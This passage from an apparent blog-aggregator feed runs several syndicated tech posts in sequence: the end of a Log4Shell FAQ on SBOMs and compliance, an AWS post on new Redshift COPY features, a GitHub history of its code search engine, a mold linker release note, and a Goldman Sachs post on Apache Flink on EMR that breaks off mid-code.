The question many Log4Shell responders — including CISOs, developers, engineers, sys admins, clients, and customers — are still grappling with is simply where affected versions of Log4j are in use within their technical ecosystems. Maintaining accurate inventories of assets has become increasingly challenging as our technical environments have become more complicated, interconnected, and wide-reaching. Our ever-growing reliance on internet-connected technologies, and the rise of shadow IT only make this problem worse.

Vulnerabilities in tools like Log4j, which is used broadly in a vast array of technologies and systems, highlight the need for more transparency and automation for asset and inventory management. Perhaps the longer-term substantive impact from Log4Shell will be to refocus investments and appreciation for the cruciality of an accurate inventory of software and associated components through an SBOM that can easily be queried and linked to dependencies.

The bottom line is that if we had lived in a timeline where SBOMs were required and in place for all software projects, identifying impacted products, devices, and ecosystems would have been much easier than it has been for Log4Shell and remediation would likely be faster and more effective.

How does Log4Shell impact my regulatory status — do I need to take special action to ensure compliance?

According to Rapid7’s resident policy and compliance expert, Harley Geiger, “Regulators may not have seen Log4Shell coming, but now that the vulnerability has been discovered, there will be an expectation that regulated companies address it. As organizations’ security programs address this widespread and serious vulnerability, those actions should be aligned with compliance requirements and reporting. For many regulated companies, the discovery of Log4Shell triggers a need to re-assess the company’s risks, the effectiveness of their safeguards to protect sensitive systems and information (including patching to the latest version), and the readiness of their incident response processes to address potential log4j exploitation. Many regulations also require these obligations to be passed on to service providers. If a Log4j exploitation results in a significant business disruption or breach of personal information, regulations may require the company to issue an incident report or breach notification.”

We also asked Harley whether we’re likely to see a public policy response. Here’s what he said…

“On a federal policy level, organizations should expect a renewed push for adoption of SBOM to help identify the presence of Log4j (and other vulnerabilities) in products and environments going forward. CISA has also required federal agencies to expedite mitigation of Log4j and has ramped up information sharing related to the vulnerability. This may add wind to the sails of cyber incident reporting legislation that is circulating in Congress at present.”

How do we know about all of this?

Well, a bunch of kids started wreaking havoc with Minecraft servers, and things just went downhill from there. While there is some truth to that, the reality is that an issue was filed on the Log4j project in late November 2021. Proof-of-concept code was released in early December, and active attacks started shortly thereafter. Some cybersecurity vendors have evidence of preliminary attacks starting on December 1, 2021.

Anyone monitoring the issue discussions (something developers, defenders, and attackers alike do on the regular) would have noticed the gaping hole this “feature” created.

How long has it been around?

There is evidence of a request for this functionality to be added dating back to 2013. A talk at Black Hat USA 2016 mentioned several JNDI injection remote code execution vectors in general but did not point to Log4j directly.

Some proof-of-concept code targeting the JNDI lookup weakness in Log4j 2.x was also discovered back in March of 2021.

Fear, Uncertainty, and Doubt (FUD) is in copious supply today and likely to persist into the coming weeks and months. While adopting an “assumed breach” mindset isn’t relevant for every celebrity vulnerability, the prevalence and transitive dependency of the Log4j library along with the sophisticated obfuscation exploit techniques we are witnessing in real time point out that the question we should be considering isn’t, “How long has it been around?” Rather, it is, “How long should we be mentally preparing ourselves (and setting expectations) to clean it up?”


Introducing new features for Amazon Redshift COPY: Part 1

Post Syndicated from Dipankar Kushari original https://aws.amazon.com/blogs/big-data/part-1-introducing-new-features-for-amazon-redshift-copy/

Amazon Redshift is a fast, scalable, secure, and fully managed cloud data warehouse that makes it simple and cost-effective to analyze all your data using standard SQL. Amazon Redshift offers up to three times better price performance than any other cloud data warehouse. Tens of thousands of customers use Amazon Redshift to process exabytes of data per day and power analytics workloads such as high-performance business intelligence (BI) reporting, dashboarding applications, data exploration, and real-time analytics.

Loading data is a key process for any analytical system, including Amazon Redshift. Loading very large datasets can take a long time and consume a lot of computing resources. How your data is loaded can also affect query performance. You can use many different methods to load data into Amazon Redshift. One of the fastest and most scalable methods is to use the COPY command. This post dives into some of the recent enhancements made to the COPY command and how to use them effectively.

Overview of the COPY command

A best practice for loading data into Amazon Redshift is to use the COPY command. The COPY command loads data in parallel from Amazon Simple Storage Service (Amazon S3), Amazon EMR, Amazon DynamoDB, or multiple data sources on any remote hosts accessible through a Secure Shell (SSH) connection.

The COPY command reads and loads data in parallel from a file or multiple files in an S3 bucket. You can take maximum advantage of parallel processing by splitting your data into multiple files, in cases where the files are compressed. The COPY command appends the new input data to any existing rows in the target table. The COPY command can load data from Amazon S3 for the file formats AVRO, CSV, JSON, and TXT, and for columnar format files such as ORC and Parquet.

Use COPY with FILLRECORD

In situations when contiguous fields are missing at the end of some of the records in data files being loaded, COPY reports an error indicating that there is a mismatch between the number of fields in the file being loaded and the number of columns in the target table. In some situations, columnar files (such as Parquet) that are produced by applications and ingested into Amazon Redshift via COPY may have additional fields added to the files (and new columns added to the target Amazon Redshift table) over time. In such cases, these files may have values absent for certain newly added fields. To load these files, you previously had to either preprocess the files to fill in values for the missing fields before loading the files using the COPY command, or use Amazon Redshift Spectrum to read the files from Amazon S3 and then use INSERT INTO to load data into the Amazon Redshift table.

With the FILLRECORD parameter, you can now load data files with a varying number of fields successfully in the same COPY command, as long as the target table has all columns defined. The FILLRECORD parameter addresses ease of use because you can now directly use the COPY command to load columnar files with varying fields into Amazon Redshift instead of achieving the same result with multiple steps.

With the FILLRECORD parameter, missing columns are loaded as NULLs. For text and CSV formats, if the missing column is a VARCHAR column, zero-length strings are loaded instead of NULLs. To load NULLs to VARCHAR columns from text and CSV, specify the EMPTYASNULL keyword. NULL substitution only works if the column definition allows NULLs.
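
As a hedged illustration for delimited text input (the table name, bucket path, and IAM role ARN are placeholders), the following COPY loads records with missing trailing fields and stores NULLs rather than zero-length strings in VARCHAR columns:

COPY target_table
FROM 's3://your-bucket/text/data.txt'
iam_role 'arn:aws:iam::123456789012:role/YourRedshiftRole'
DELIMITER '|' FILLRECORD EMPTYASNULL;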

Use FILLRECORD while loading Parquet data from Amazon S3

In this section, we demonstrate the utility of FILLRECORD by using a Parquet file that has a smaller number of fields populated than the number of columns in the target Amazon Redshift table. First we try to load the file into the table without the FILLRECORD parameter in the COPY command, then we use the FILLRECORD parameter in the COPY command.

For the purpose of this demonstration, we have created the following components:

  • An Amazon Redshift cluster with a database, public schema, awsuser as admin user, and an AWS Identity and Access Management (IAM) role, used to perform the COPY command to load the file from Amazon S3, attached to the Amazon Redshift cluster. For details on authorizing Amazon Redshift to access other AWS services, refer to Authorizing Amazon Redshift to access other AWS services on your behalf.
  • An Amazon Redshift table named call_center_parquet.
  • A Parquet file already uploaded to an S3 bucket from where the file is copied into the Amazon Redshift cluster.

The following code is the definition of the call_center_parquet table:

DROP TABLE IF EXISTS public.call_center_parquet;
CREATE TABLE IF NOT EXISTS public.call_center_parquet
(
	cc_call_center_sk INTEGER NOT NULL ENCODE az64
	,cc_call_center_id varchar(100) NOT NULL  ENCODE lzo
	,cc_rec_start_date VARCHAR(50)   ENCODE lzo
	,cc_rec_end_date VARCHAR(50)   ENCODE lzo
	,cc_closed_date_sk varchar (100)   ENCODE lzo
	,cc_open_date_sk INTEGER   ENCODE az64
	,cc_name VARCHAR(50)   ENCODE lzo
	,cc_class VARCHAR(50)   ENCODE lzo
	,cc_employees INTEGER   ENCODE az64
	,cc_sq_ft INTEGER   ENCODE az64
	,cc_hours VARCHAR(20)   ENCODE lzo
	,cc_manager VARCHAR(40)   ENCODE lzo
	,cc_mkt_id INTEGER   ENCODE az64
	,cc_mkt_class VARCHAR(50)   ENCODE lzo
	,cc_mkt_desc VARCHAR(100)   ENCODE lzo
	,cc_market_manager VARCHAR(40)   ENCODE lzo
	,cc_division INTEGER   ENCODE az64
	,cc_division_name VARCHAR(50)   ENCODE lzo
	,cc_company INTEGER   ENCODE az64
	,cc_company_name VARCHAR(50)   ENCODE lzo
	,cc_street_number INTEGER   ENCODE az64
	,cc_street_name VARCHAR(60)   ENCODE lzo
	,cc_street_type VARCHAR(15)   ENCODE lzo
	,cc_suite_number VARCHAR(10)   ENCODE lzo
	,cc_city VARCHAR(60)   ENCODE lzo
	,cc_county VARCHAR(30)   ENCODE lzo
	,cc_state CHAR(2)   ENCODE lzo
	,cc_zip INTEGER   ENCODE az64
	,cc_country VARCHAR(20)   ENCODE lzo
	,cc_gmt_offset NUMERIC(5,2)   ENCODE az64
	,cc_tax_percentage NUMERIC(5,2)   ENCODE az64
)
DISTSTYLE ALL
;
ALTER TABLE public.call_center_parquet OWNER TO awsuser;

The table has 31 columns.

The Parquet file doesn’t contain any value for the cc_gmt_offset and cc_tax_percentage fields. It has 29 columns. The following screenshot shows the schema definition for the Parquet file located in Amazon S3, which we load into Amazon Redshift.

We ran the COPY command two different ways: with or without the FILLRECORD parameter.

We first tried to load the Parquet file into the call_center_parquet table without the FILLRECORD parameter:

COPY call_center_parquet
FROM 's3://*****************/parquet/part-00000-d9a3ab22-9d7d-439a-b607-2ddc2d39c5b0-c000.snappy.parquet'
iam_role 'arn:aws:iam::**********:role/RedshiftAttachedRole'
FORMAT PARQUET;

It generated an error while performing the copy.

Next, we tried to load the Parquet file into the call_center_parquet table and used the FILLRECORD parameter:

COPY call_center_parquet
FROM 's3://*****************/parquet/part-00000-d9a3ab22-9d7d-439a-b607-2ddc2d39c5b0-c000.snappy.parquet'
iam_role 'arn:aws:iam::**********:role/RedshiftAttachedRole'
FORMAT PARQUET FILLRECORD;

The Parquet data was loaded successfully in the call_center_parquet table, and NULL was entered into the cc_gmt_offset and cc_tax_percentage columns.

Split large text files while copying

The second new feature we discuss in this post is automatically splitting large files to take advantage of the massive parallelism of the Amazon Redshift cluster. A best practice when using the COPY command in Amazon Redshift is to load data using a single COPY command from multiple data files. This loads data in parallel by dividing the workload among the nodes and slices in the Amazon Redshift cluster. When all the data from a single file or small number of large files is loaded, Amazon Redshift is forced to perform a much slower serialized load, because the Amazon Redshift COPY command can’t utilize the parallelism of the Amazon Redshift cluster. You have to write additional preprocessing steps to split the large files into smaller files so that the COPY command loads data in parallel into the Amazon Redshift cluster.

The COPY command now supports automatically splitting a single file into multiple smaller scan ranges. This feature is currently supported only for large uncompressed delimited text files. More file formats and options, such as COPY with the CSV keyword, will be added in the near future.

This helps improve performance for COPY queries when loading a small number of large uncompressed delimited text files into your Amazon Redshift cluster. Scan ranges are implemented by splitting the files into 64 MB chunks, which get assigned to each Amazon Redshift slice. This change addresses ease of use because you don’t need to split large uncompressed text files as an additional preprocessing step.

With Amazon Redshift’s ability to split large uncompressed text files, you can see performance improvements for the COPY command with a single large file or a few files with significantly varying relative sizes (for example, one file 5 GB in size and 20 files of a few KBs). Performance improvements for the COPY command are more significant as the file size increases even with keeping the same Amazon Redshift cluster configuration. Based on tests done, we observed a more than 1,500% performance improvement for the COPY command for loading a 6 GB uncompressed text file when the auto splitting feature became available.

There are no changes in the COPY query or keywords to enable this change, and splitting of files is automatically applied for the eligible COPY commands. Splitting isn’t applicable for the COPY query with the keywords CSV, REMOVEQUOTES, ESCAPE, and FIXEDWIDTH.

For the test, we used a single 6 GB uncompressed text file and the following COPY command:

COPY store_sales
FROM 's3://*****************/text/store_sales.txt'
iam_role 'arn:aws:iam::**********:role/RedshiftAttachedRole';

The Amazon Redshift cluster without the auto split option took 102 seconds to copy the file from Amazon S3 to the Amazon Redshift store_sales table. When the auto split option was enabled in the Amazon Redshift cluster (without any other configuration changes), the same 6 GB uncompressed text file took just 6.19 seconds to copy the file from Amazon S3 to the store_sales table.

Summary

In this post, we showed two enhancements to the Amazon Redshift COPY command. First, we showed how you can add the FILLRECORD parameter to the COPY command to successfully load data files even when contiguous fields are missing at the end of some of the records, as long as the target table has all the columns. Second, we described how Amazon Redshift auto splits large uncompressed text files into 64 MB chunks before copying them into the Amazon Redshift cluster to enhance COPY performance. This automatic splitting lets you run the COPY command on large uncompressed text files without adding a preprocessing step to split the large files yourself. Try these features to make your data loading to Amazon Redshift much simpler by removing custom preprocessing steps.

In Part 2 of this series, we will discuss additional new features of the Amazon Redshift COPY command and demonstrate how you can take advantage of them to optimize your data loading process.


About the Authors

Dipankar Kushari is a Senior Analytics Solutions Architect with AWS.

Cody Cunningham is a Software Development Engineer with AWS, working on data ingestion for Amazon Redshift.

Joe Yong is a Senior Technical Product Manager on the Amazon Redshift team and a relentless pursuer of making complex database technologies easy and intuitive for the masses. He has worked on database and data management systems for SMP, MPP, and distributed systems. Joe has shipped dozens of features for on-premises and cloud-native databases that serve IoT devices through petabyte-sized cloud data warehouses. Off keyboard, Joe tries to onsight 5.11s, hunt for good eats, and seek a cure for his Australian Labradoodle’s obsession with squeaky tennis balls.

Anshul Purohit is a Software Development Engineer with AWS, working on data ingestion and query processing for Amazon Redshift.

A brief history of code search at GitHub

Post Syndicated from Pavel Avgustinov original https://github.blog/2021-12-15-a-brief-history-of-code-search-at-github/

We recently launched a technology preview for the next-generation code search we have been building. If you haven’t signed up already, go ahead and do it now!

We want to share more about our work on code exploration, navigation, search, and developer productivity. Recently, we substantially improved the precision of our code navigation for Python, and open-sourced the tools we developed for this. The stack graph formalism we developed will form the basis for precise code navigation support for more languages, and will even allow us to empower language communities to build and improve support for their own languages, similarly to how we accept contributions to github/linguist to expand GitHub’s syntax highlighting capabilities.

This blog post is part of the same series, and tells the story of why we built a new search engine optimized for code over the past 18 months. What challenges did we set ourselves? What is the historical context, and why could we not continue to build on off-the-shelf solutions? Read on to find out.

What’s our goal?

We set out to provide an experience that could become an integral part of every developer’s workflow. This has imposed hard constraints on the features, performance, and scalability of the system we’re building. In particular:

  • Searching code is different: many standard techniques (like stemming and tokenization) are at odds with the kind of searches we want to support for source code. Identifier names and punctuation matter. We need to be able to match substrings, not just whole “words”. Specialized queries can require wildcards or even regular expressions. In addition, scoring heuristics tuned for natural language and web pages do not work well for source code.
  • The scale of the corpus: GitHub hosts over 200 million repositories, with over 61 million repositories created in the past year. We aim to support global queries across all of them, now and in the foreseeable future.
  • The rate of change: over 170 million pull requests were merged in the past year, and this does not even account for code pushed directly to a branch. We would like our index to reflect the updated state of a repository within a few minutes of a push event.
  • Search performance and latency: developers want their tools to be blazingly fast, and if we want to become part of every developer’s workflow we have to satisfy that expectation. Despite the scale of our index, we want p95 query times to be (well) under a second. Most user queries, or queries scoped to a set of repositories or organizations, should be much faster than that.

Over the years, GitHub has leveraged several off-the-shelf solutions, but as the requirements evolved over time, and the scale problem became ever more daunting, we became convinced that we had to build a bespoke search engine for code to achieve our objectives.

The early years

In the beginning, GitHub announced support for code search, as you might expect from a website with the tagline of “Social Code Hosting.” And all was well.

Screenshot of GitHub public code search

Except… you might note the disclaimer “GitHub Public Code Search.” This first iteration of global search worked by indexing all public documents into a Solr instance, which determined the results you got. While this nicely side-steps visibility and authorization concerns (everything is public!), not allowing private repositories to be searched would be a major functionality gap. The solution?

Screenshot of Solr-backed "Search source code"

Image credit: Patrick Linskey on Stack Overflow

The repository page showed a “Search source code” field. For public repos, this was still backed by the Solr index, scoped to the active repository. For private repos, it shelled out to git grep.

Quite soon after shipping this, the then-in-beta Google Code Search began crawling public repositories on GitHub too, thus giving developers an alternative way of searching them. (Ultimately, Google Code Search was discontinued a few years later, though Russ Cox’s excellent blog post on how it worked remains a great source of inspiration for successor projects.)

Unfortunately, the different search experience for public and private repositories proved pretty confusing in practice. In addition, while git grep is a widely understood gold standard for how to search the contents of a Git repository, it operates without a dedicated index and hence works by scanning each document—taking time proportional to the size of the repository. This could lead to resource exhaustion on the Git hosts, and to an unresponsive web page, making it necessary to introduce timeouts. Large private repositories remained unsearchable.

Scaling with Elasticsearch

By 2010, the search landscape was seeing considerable upheaval. Solr joined Lucene as a subproject, and Elasticsearch sprang up as a great way of building and scaling on top of Lucene. While Elasticsearch wouldn’t hit a 1.0.0 release until February 2014, GitHub started experimenting with adopting it in 2011. An initial tentative experiment that indexed gists into Elasticsearch to make them searchable showed great promise, and before long it was clear that this was the future for all search on GitHub, including code search.

Indeed in early 2013, just as Google Code Search was winding down, GitHub launched a whole new code search backed by an Elasticsearch cluster, consolidating the search experience for public and private repositories and updating the design. The search index covered almost five million repositories at launch.

Screenshot of Elasticsearch-backed code search UI

The scale of operations was definitely challenging, and within days or weeks of the launch GitHub experienced its first code search outages. The postmortem blog post is quite interesting on several levels, and it gives a glimpse of the cluster size (26 storage nodes with 2 TB of SSD storage each), utilization (67% of storage used), environment (Elasticsearch 0.19.9 and 0.20.2, Java 6 and 7), and indexing complexity (several months to backfill all repository data). Several bugs in Elasticsearch were identified and fixed, allowing GitHub to resume operations on the code search service.

In November 2013, Elasticsearch published a case study on GitHub’s code search cluster, again including some interesting data on scale. By that point, GitHub was indexing eight million repositories and responding to 5 search requests per second on average.

In general, our experience working with Elasticsearch has been truly excellent. It powers all kinds of search on GitHub.com, doing an excellent job throughout. The code search index is by far the largest cluster we operate, and it has grown in scale by another 20-40x since the case study (to 162 nodes, comprising 5184 vCPUs, 40TB of RAM, and 1.25PB of backing storage, supporting a query load of 200 requests per second on average and indexing over 53 billion source files). It is a testament to the capabilities of Elasticsearch that we have got this far with essentially an off-the-shelf search engine.

My code is not a novel

Elasticsearch excelled at most search workloads, but almost immediately some wrinkles and friction started cropping up in connection with code search. Perhaps the most widely observed is this comment from the code search documentation:

You can’t use the following wildcard characters as part of your search query: . , : ; / \ ` ' " = * ! ? # $ & + ^ | ~ < > ( ) { } [ ] @. The search will simply ignore these symbols.

Source code is not like normal text, and those “punctuation” characters actually matter. So why are they ignored by GitHub’s production code search? It comes down to how our ingest pipeline for Elasticsearch is configured.

When documents are added to an Elasticsearch index, they are passed through a process called text analysis, which converts unstructured text into a structured format optimized for search. Commonly, text analysis is configured to normalize away details that don’t matter to search (for example, case folding the document to provide case-insensitive matches, or compressing runs of whitespace into one, or stemming words so that searching for “ingestion” also finds “ingest pipeline”). Ultimately, it performs tokenization, splitting the normalized input document into a list of tokens whose occurrence should be indexed.

Many features and defaults available to text analysis are geared towards indexing natural-language text. To create an index for source code, we defined a custom text analyzer, applying a carefully selected set of normalizations (for example, case-folding and compressing whitespace make sense, but stemming does not). Then, we configured a custom pattern tokenizer, splitting the document using the following regular expression: %q_[.,:;/\\\\`'"=*!@?#$&+^|~<>(){}\[\]\s]_. If you look closely, you’ll recognise the list of characters that are ignored in your query string!

The tokens resulting from this split then undergo a final round of splitting, extracting word parts delimited in CamelCase and snake_case as additional tokens to make them searchable. To illustrate, suppose we are ingesting a document containing this declaration: pub fn pthread_getname_np(tid: ::pthread_t, name: *mut ::c_char, len: ::size_t) -> ::c_int;. Our text analysis phase would pass the following list of tokens to Elasticsearch to index: pub fn pthread_getname_np pthread getname np tid pthread_t pthread t name mut c_char c char len size_t size t c_int c int. The special characters simply do not figure in the index; instead, the focus is on words recovered from identifiers and keywords.
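To make this concrete, the following is a small, self-contained Java sketch of the two-stage splitting described above. It is an approximation for illustration only (the class name, the simplified character class, and the CamelCase/snake_case handling are ours), not the analyzer that runs in production:

import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class CodeTokenizerSketch {
    // Approximation of the special-character and whitespace split described above
    // (with '-' added to the class for this sketch).
    private static final Pattern SPLIT =
            Pattern.compile("[.,:;/\\\\`'\"=*!@?#$&+^|~<>(){}\\[\\]\\s-]+");
    // Secondary split on snake_case underscores and lower-to-upper CamelCase boundaries.
    private static final Pattern WORD_PARTS =
            Pattern.compile("_|(?<=[a-z0-9])(?=[A-Z])");

    public static List<String> tokenize(String line) {
        List<String> tokens = new ArrayList<>();
        for (String token : SPLIT.split(line)) {
            if (token.isEmpty()) {
                continue;
            }
            tokens.add(token); // index the full identifier...
            String[] parts = WORD_PARTS.split(token);
            if (parts.length > 1) { // ...plus its word parts, if any
                for (String part : parts) {
                    if (!part.isEmpty()) {
                        tokens.add(part.toLowerCase());
                    }
                }
            }
        }
        return tokens;
    }

    public static void main(String[] args) {
        System.out.println(tokenize(
                "pub fn pthread_getname_np(tid: ::pthread_t, name: *mut ::c_char) -> ::c_int;"));
    }
}

Running the sketch on the declaration above yields the full identifiers plus their word parts, closely matching the token list shown earlier.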

Designing a text analyzer is tricky, and involves hard trade-offs between index size and performance on the one hand, and the types of queries that can be answered on the other. The approach described above was the result of careful experimentation with different strategies, and represented a good compromise that has allowed us to launch and evolve code search for almost a decade.

 
Another consideration for source code is substring matching. Suppose that I want to find out how to get the name of a thread in Rust, and I vaguely remember the function is called something like thread_getname. Searching for thread_getname org:rust-lang will give no results on our Elasticsearch index; meanwhile, if I cloned rust-lang/libc locally and used git grep, I would instantly find pthread_getname_np. More generally, power users reach for regular expression searches almost immediately.

The earliest internal discussions of this that I can find date to October 2012, more than a year before the public release of Elasticsearch-based code search. We considered various ways of refining the Elasticsearch tokenization (in fact, we turn pthread_getname_np into the tokens pthread, getname, np, and pthread_getname_np—if I had searched for pthread getname rather than thread_getname, I would have found the definition of pthread_getname_np). We also evaluated trigram tokenization as described by Russ Cox. Our conclusion was summarized by a GitHub employee as follows:

The trigram tokenization strategy is very powerful. It will yield wonderful search results at the cost of search time and index size. This is the approach I would like to take, but there is work to be done to ensure we can scale the ElasticSearch cluster to meet the needs of this strategy.

Given the initial scale of the Elasticsearch cluster mentioned above, it wasn’t viable to substantially increase storage and CPU requirements at the time, and so we launched with a best-effort tokenization tuned for code identifiers.

Over the years, we kept coming back to this discussion. One promising idea for supporting special characters, inspired by some conversations with Elasticsearch experts at Elasticon 2016, was to use a Lucene tokenizer pattern that split code on runs of whitespace, but also on transitions from word characters to non-word characters (crucially, using lookahead/lookbehind assertions, without consuming any characters in this case; this would create a token for each special character). This would allow a search for ”answer >= 42” to find the source text answer >= 42 (disregarding whitespace, but including the comparison). Experiments showed this approach took 43-100% longer to index code, and produced an index that was 18-28% larger than the baseline. Query performance also suffered: at best, it was as fast as the baseline, but some queries (especially those that used special characters, or otherwise split into many tokens) were up to 4x slower. In the end, a typical query slowdown of 2.1x seemed like too high a price to pay.

By 2019, we had made significant investments in scaling our Elasticsearch cluster simply to keep up with the organic growth of the underlying code corpus. This gave us some performance headroom, and at GitHub Universe 2019 we felt confident enough to announce an “exact-match search” beta, which essentially followed the ideas above and was available for allow-listed repositories and organizations. We projected around a 1.3x increase in Elasticsearch resource usage for this index. The experience from the limited beta was very illuminating, but it proved too difficult to balance the additional resource requirements with ongoing growth of the index. In addition, even after the tokenization improvements, there were still numerous unsupported use cases (like substring searches and regular expressions) that we saw no path towards. Ultimately, exact-match search was sunset in just over half a year.

Project Blackbird

Actually, a major factor in pausing investment in exact-match search was a very promising research prototype search engine, internally code-named Blackbird. The project had been kicked off in early 2020, with the goal of determining which technologies would enable us to offer code search features at GitHub scale, and it showed a path forward that has led to the technology preview we launched last week.

Let’s recall our ambitious objectives: comprehensively index all source code on GitHub, support incremental indexing and document deletion, and provide lightning-fast exact-match and regex searches (specifically, a p95 of under a second for global queries, with correspondingly lower targets for org-scoped and repo-scoped searches). Do all this without using substantially more resources than the existing Elasticsearch cluster. Integrate other sources of rich code intelligence information available on GitHub. Easy, right?

We found that no off-the-shelf code indexing solution could satisfy those requirements. Russ Cox’s trigram index for code search only stores document IDs rather than positions in the posting lists; while that makes it very space-efficient, performance degrades rapidly with a large corpus size. Several successor projects augment the posting lists with position information or other data; this comes at a large storage and RAM cost (Zoekt reports a typical index size of 3.5x corpus size) that makes it too expensive at our scale. The sharding strategy is also crucial, as it determines how evenly distributed the load is. And any significant per-repo overhead becomes prohibitive when considering scaling the index to all repositories on GitHub.

In the end, Blackbird convinced us to go all-in on building a custom search engine for code. Written in Rust, it creates and incrementally maintains a code search index sharded by Git blob object ID; this gives us substantial storage savings via deduplication and guarantees a uniform load distribution across shards (something that classic approaches sharding by repo or org, like our existing Elasticsearch cluster, lack). It supports regular expression searches over document content and can capture additional metadata—for example, it also maintains an index of symbol definitions. It meets our performance goals: while it’s always possible to come up with a pathological search that misses the index, it’s exceptionally fast for “real” searches. The index is also extremely compact, weighing in at about ⅔ of the (deduplicated) corpus size.

One crucial realization was that if we want to index all code on GitHub into a single index, result scoring and ranking are absolutely critical; you really need to find useful documents first. Blackbird implements a number of heuristics, some code-specific (ranking up definitions and penalizing test code), and others general-purpose (ranking up complete matches and penalizing partial matches, so that when searching for thread an identifier called thread will rank above thread_id, which will rank above pthread_getname_np). Of course, the repository in which a match occurs also influences ranking. We want to show results from popular open-source repositories before a random match in a long-forgotten repository created as a test.

All of this is very much a work in progress. We are continuously tuning our scoring and ranking heuristics, optimizing the index and query process, and iterating on the query language. We have a long list of features to add. But we want to get what we have today into the hands of users, so that your feedback can shape our priorities.

We have more to share about the work we’re doing to enhance developer productivity at GitHub, so stay tuned.

The shoulders of giants

Modern software development is about collaboration and about leveraging the power of open source. Our new code search is no different. We wouldn’t have gotten anywhere close to its current state without the excellent work of tens of thousands of open source contributors and maintainers who built the tools we use, the libraries we depend on, and whose insightful ideas we could adopt and develop. A small selection of shout-outs and thank-yous:

  • The communities of the languages and frameworks we build on: Rust, Go, and React. Thanks for enabling us to move fast.
  • @BurntSushi: we are inspired by Andrew’s prolific output, and his work on the regex and aho-corasick crates in particular has been invaluable to us.
  • @lemire’s work on fast bit packing is integral to our design, and we drew a lot of inspiration from his optimization work more broadly (especially regarding the use of SIMD). Check out his blog for more.
  • Enry and Tree-sitter, which power Blackbird’s language detection and symbol extraction, respectively.

Mold (linker) 1.0 released

Post Syndicated from original https://lwn.net/Articles/878759/rss

Version 1.0 of the mold linker has been released.

mold 1.0 is the first stable and production-ready release of the
high-speed linker. On Linux-based systems, it should “just work” as
a faster drop-in replacement for the default GNU linker for most
user-land programs. If you are building a large executable which
takes a long time to link, mold is worth a try to see if it can
shorten your build time.

How Goldman Sachs built persona tagging using Apache Flink on Amazon EMR

Post Syndicated from Balasubramanian Sakthivel original https://aws.amazon.com/blogs/big-data/how-goldman-sachs-built-persona-tagging-using-apache-flink-on-amazon-emr/

The Global Investment Research (GIR) division at Goldman Sachs is responsible for providing research and insights to the firm’s clients in the equity, fixed income, currency, and commodities markets. One of the long-standing goals of the GIR team is to deliver a personalized experience and relevant research content to their research users. Previously, in order to customize the user experience for their various types of clients, GIR offered a few distinct editions of their research site that were provided to users based on broad criteria. However, GIR did not have any way to create a personally curated content flow at the individual user level. To provide this functionality, GIR wanted to implement a system to actively filter the content that is recommended to their users on a per-user basis, keyed on characteristics such as the user’s job title or working region. Having this kind of system in place would both improve the user experience and simplify the workflows of GIR’s research users, by reducing the amount of time and effort required to find the research content that they need.

The first step towards achieving this is to directly classify GIR’s research users based on their profiles and readership. To that end, GIR created a system to tag users with personas. Each persona represents a type or classification that individual users can be tagged with, based on certain criteria. For example, GIR has a series of personas for classifying a user’s job title, and a user tagged with the “Chief Investment Officer” persona will have different research content highlighted and have a different site experience compared to one that is tagged with the “Corporate Treasurer” persona. This persona-tagging system can both efficiently carry out the data operations required for tagging users, as well as have new personas created as needed to fit use cases as they emerge.

In this post, we look at how GIR implemented this system using Amazon EMR.

Challenge

Given the number of contacts (i.e., millions) and the growing number of publications maintained in GIR’s research data store, creating a system for classifying users and recommending content is a scalability challenge. A newly created persona could potentially apply to almost every contact, in which case a tagging operation would need to be performed on several million data entries. In general, the number of contacts, the complexity of the data stored per contact, and the amount of criteria for personalization can only increase. To future-proof their workflow, GIR needed to ensure that their solution could handle the processing of large amounts of data as an expected and frequent case.

GIR’s business goal is to support two kinds of workflows for classification criteria: ad hoc and ongoing. An ad hoc criteria causes users that currently fit the defining criteria condition to immediately get tagged with the required persona, and is meant to facilitate the one-time tagging of specific contacts. On the other hand, an ongoing criteria is a continuous process that automatically tags users with a persona if a change to their attributes causes them to fit the criteria condition. The following diagram illustrates the desired personalization flow:

In the rest of this post, we focus on the design and implementation of GIR’s ad hoc workflow.

Apache Flink on Amazon EMR

To meet GIR’s scalability demands, they determined that Amazon EMR was the best fit for their use case, being a managed big data platform meant for processing large amounts of data using open source technologies such as Apache Flink. Although GIR evaluated a few other options that addressed their scalability concerns (such as AWS Glue), GIR chose Amazon EMR for its ease of integration into their existing systems and possibility to be adapted for both batch and streaming workflows.

Apache Flink is an open source big data distributed stream and batch processing engine that efficiently processes data from continuous events. Flink offers exactly-once guarantees, high throughput and low latency, and is suited for handling massive data streams. Also, Flink provides many easy-to-use APIs and mitigates the need for the programmer to worry about failures. However, building and maintaining a pipeline based on Flink comes with operational overhead and requires considerable expertise, in addition to provisioning physical resources.

Amazon EMR empowers users to create, operate, and scale big data environments such as Apache Flink quickly and cost-effectively. We can optimize costs by using Amazon EMR managed scaling to automatically increase or decrease the cluster nodes based on workload. In GIR’s use case, their users need to be able to trigger persona-tagging operations at any time, and require a predictable completion time for their jobs. For this, GIR decided to launch a long-running cluster, which allows multiple Flink jobs to be submitted simultaneously to the same cluster.

Ad hoc persona-tagging infrastructure and workflow

The following diagram illustrates the architecture of GIR’s ad hoc persona-tagging workflow on the AWS Cloud.

This is a broad overview, and the specifics of networking and security between components are out of scope for this post.

At a high level, we can discuss GIR’s workflow in four parts:

  1. Upload the Flink job artifacts to the EMR cluster.
  2. Trigger the Flink job.
  3. Within the Flink job, transform and then store user data.
  4. Continuous monitoring.

You can interact with Flink on Amazon EMR via the Amazon EMR console or the AWS Command Line Interface (AWS CLI). After launching the cluster, GIR used the Flink API to interact with and submit work to the Flink application. The Flink API provided more functionality than those options and was much easier to invoke from an AWS Lambda application.
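As an illustration of the kind of call involved, the following is a minimal Java sketch of starting a previously uploaded job through Flink’s REST API (the /jars/{jarId}/run endpoint). The host, port, JAR ID, and entry class are hypothetical placeholders, and this is a simplified stand-in rather than GIR’s actual Lambda code:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class FlinkJobTriggerSketch {
    public static void main(String[] args) throws Exception {
        // Hypothetical values: the Flink REST endpoint on the EMR primary node,
        // the JAR ID returned by an earlier /jars/upload call, and the job entry class.
        String flinkRestUrl = "http://emr-primary-node:8081";
        String jarId = "example-persona-tagging-job.jar";
        String entryClass = "com.example.PersonaTaggingJob";

        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create(flinkRestUrl + "/jars/" + jarId + "/run?entry-class=" + entryClass))
                .POST(HttpRequest.BodyPublishers.noBody())
                .build();

        // The response body contains the ID of the newly started Flink job.
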